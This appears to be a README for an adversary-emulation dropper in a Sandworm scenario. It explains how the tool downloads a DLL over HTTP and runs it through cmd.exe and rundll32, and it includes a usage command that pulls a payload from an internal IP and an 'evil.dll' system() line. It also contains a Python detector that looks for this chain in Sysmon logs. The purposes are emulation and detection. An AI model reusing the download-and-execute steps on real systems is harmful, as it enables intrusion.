# Exaramel Windows Dropper

This program is used in Step 5 of the Sandworm scenario to download and execute Exaramel-Windows.dll.

This program is executed on the target via PsExec.py.

This program then downloads the DLL over HTTP using the URLDownloadToFile API (urlmon.dll).

The downloaded DLL is then executed via the C standard library's system(), which hands the command to cmd.exe /c, so the resulting process chain on the target is Exaramel-Windows-Dropper.exe -> cmd.exe -> rundll32.exe:

    system("rundll32.exe evil.dll,Start")
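The execution chain above (cmd.exe /c launching rundll32.exe with a DLL that is not one of the system's own) is what a defender would look for in process-creation telemetry. The following is an added example, not code from this repository: it checks Sysmon Event ID 1 style records for that chain. The records are constructed for the example, and the working directory `C:\Windows\` in the first record is an assumption. One point the check handles: the README's example passes the DLL as the relative path `.\Exaramel-Windows.dll`, so a rule that only inspects absolute paths would miss it; the check flags explicit relative paths and resolves them against the logged current directory before deciding whether the DLL lives in a system directory.

```python
"""Flag rundll32.exe process-creation events that look like a dropped DLL being run."""
import ntpath
import re

# rundll32 <dll>,<export> ...   (image may be bare, pathed or quoted; DLL may be quoted)
RUNDLL_RE = re.compile(
    r'^\s*"?(?:[^"\s]*\\)?rundll32(?:\.exe)?"?\s+'
    r'(?:"(?P<qdll>[^"]+)"|(?P<dll>[^,\s]+))'
    r'\s*,\s*(?P<export>[^\s,]+)',
    re.IGNORECASE,
)

# Directories from which rundll32 is routinely given DLLs to load on a stock host.
SYSTEM_DLL_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")

# Constructed Sysmon Event ID 1 style records (field names follow Sysmon, values are made up).
SAMPLE_EVENTS = [
    {   # the dropper's system() call: cmd.exe /c rundll32.exe <dll>,Start
        "Image": "C:\\Windows\\System32\\rundll32.exe",
        "CommandLine": "rundll32.exe .\\Exaramel-Windows.dll,Start",
        "CurrentDirectory": "C:\\Windows\\",            # assumed working directory
        "ParentImage": "C:\\Windows\\System32\\cmd.exe",
        "ParentCommandLine": "cmd.exe /c rundll32.exe .\\Exaramel-Windows.dll,Start",
    },
    {   # benign: Control Panel applet launched from the shell
        "Image": "C:\\Windows\\System32\\rundll32.exe",
        "CommandLine": "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "ParentCommandLine": "C:\\Windows\\explorer.exe",
    },
    {   # absolute path to a user-writable location, but not via cmd.exe /c
        "Image": "C:\\Windows\\System32\\rundll32.exe",
        "CommandLine": "\"C:\\Windows\\System32\\rundll32.exe\" \"C:\\Users\\Public\\x.dll\",Start",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "ParentCommandLine": "C:\\Windows\\explorer.exe",
    },
    {   # benign: bare system DLL name, resolved by the normal DLL search order
        "Image": "C:\\Windows\\System32\\rundll32.exe",
        "CommandLine": "rundll32.exe user32.dll,LockWorkStation",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "ParentCommandLine": "C:\\Windows\\explorer.exe",
    },
]


def _norm(path):
    """Lower-case, backslash-only, dot-free form so prefix checks do not depend on log spelling."""
    return ntpath.normpath(path.replace("/", "\\")).lower()


def parse_rundll32(cmdline):
    """Return (dll, export) from a rundll32 command line, or None if it is not in that shape."""
    m = RUNDLL_RE.match(cmdline)
    if not m:
        return None
    return (m.group("qdll") or m.group("dll")), m.group("export")


def analyze(event):
    """Return the reasons this event is suspicious; empty for benign or non-rundll32 events."""
    if ntpath.basename(event.get("Image", "")).lower() != "rundll32.exe":
        return []
    parsed = parse_rundll32(event.get("CommandLine", ""))
    if parsed is None:
        return []
    dll, _export = parsed
    reasons = []

    if ntpath.isabs(dll):
        resolved = _norm(dll)
    elif "\\" in dll or "/" in dll:
        # Explicit relative path: rundll32 resolves it from the process's working directory.
        reasons.append("relative_dll_path")
        resolved = _norm(ntpath.join(event.get("CurrentDirectory", ""), dll))
    else:
        # Bare file name: assume the DLL search order finds it in System32 (assumption; tune per host).
        resolved = _norm(ntpath.join(SYSTEM_DLL_DIRS[0], dll))
    if not resolved.startswith(SYSTEM_DLL_DIRS):
        reasons.append("dll_outside_system_dirs")

    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    if parent == "cmd.exe" and re.search(r"\s/c\s", event.get("ParentCommandLine", ""), re.IGNORECASE):
        # The Microsoft C runtime's system() runs its argument as "cmd.exe /c <command>".
        reasons.append("spawned_via_cmd_c")
    return reasons


def find_suspicious(events):
    """Return (index, dll, export, reasons) for every event with at least one reason."""
    hits = []
    for i, ev in enumerate(events):
        reasons = analyze(ev)
        if reasons:
            dll, export = parse_rundll32(ev["CommandLine"])
            hits.append((i, dll, export, reasons))
    return hits


if __name__ == "__main__":
    for idx, dll, export, reasons in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: rundll32 {dll},{export} -> {', '.join(reasons)}")
```

The three reasons are deliberately independent so the output can be scored: a relative DLL path plus a cmd.exe /c parent together reproduce the dropper's exact chain, while "dll_outside_system_dirs" alone is a lower-confidence signal that installers and third-party software also trigger.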

# Quick Start

Execute this program on Windows:

Usage:
    .\Exaramel-Windows-Dropper.exe <url> <file_path>

Example:
    .\Exaramel-Windows-Dropper.exe http://192.168.0.4/getFile/Exaramel-Windows.dll .\Exaramel-Windows.dll

Note: If the URL uses HTTPS, URLDownloadToFile validates the server certificate, so a self-signed certificate makes the download fail unless that certificate has first been imported into the target system's trusted root store.

# Build Instructions

Download and install a C++ compiler (TDM-GCC): https://jmeubank.github.io/tdm-gcc/download/

Run the make.bat script from a terminal (cmd.exe):

    make.bat

You should then have 'Exaramel-Windows-Dropper.exe' in the current working directory.

# Cleanup Instructions

Delete Exaramel-Windows-Dropper.exe and any downloaded files (the DLL written to <file_path>).

Reboot the system to flush any DLLs from process memory.

# CTI Evidence

Sandworm Team used a backdoor that could execute a supplied DLL using rundll32.exe.

https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/